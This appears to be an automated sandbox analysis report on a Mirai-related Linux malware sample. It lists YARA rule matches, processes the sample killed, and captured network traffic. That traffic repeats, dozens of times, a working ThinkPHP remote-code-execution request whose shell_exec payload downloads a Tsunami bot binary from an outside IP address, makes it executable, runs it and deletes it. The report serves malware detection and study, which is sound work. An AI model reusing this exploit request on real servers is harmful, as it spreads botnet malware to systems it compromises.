        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
        Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://103.136.43.52/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0

        System Summary

        barindex
        Source: qJlf2SjoW4, type: SAMPLEMatched rule: Detects ELF malware Mirai related Author: Florian Roth
        Source: 6232.1.000000005174e606.000000008584956c.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
        Source: 6236.1.000000005174e606.000000008584956c.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 936, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 720, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 759, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 761, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 788, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 797, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 799, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 800, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 847, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 884, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 1334, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 1335, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 1389, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 1633, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 1809, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 1860, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 1872, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 1983, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 2048, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 2069, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 2096, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 2097, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 2102, result: successful
        Source: qJlf2SjoW4, type: SAMPLEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), score = , modified = 2022-05-13
        Source: qJlf2SjoW4, type: SAMPLEMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
        Source: 6232.1.0000000085a0537c.000000003b1b2593.rw-.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), score = , modified = 2022-05-13
        Source: 6236.1.0000000085a0537c.000000003b1b2593.rw-.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), score = , modified = 2022-05-13
        Source: 6232.1.000000005174e606.000000008584956c.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), score = , modified = 2022-05-13
        Source: 6232.1.000000005174e606.000000008584956c.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
        Source: 6236.1.000000005174e606.000000008584956c.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), score = , modified = 2022-05-13
        Source: 6236.1.000000005174e606.000000008584956c.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 936, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 720, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 759, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 761, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 788, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 797, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 799, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 800, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 847, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 884, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 1334, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 1335, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 1389, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 1633, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 1809, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 1860, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 1872, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 1983, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 2048, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 2069, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 2096, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 2097, result: successful
        Source: /tmp/qJlf2SjoW4 (PID: 6248)SIGKILL sent: pid: 2102, result: successful
        Source: ELF static info symbol of initial sample.symtab present: no
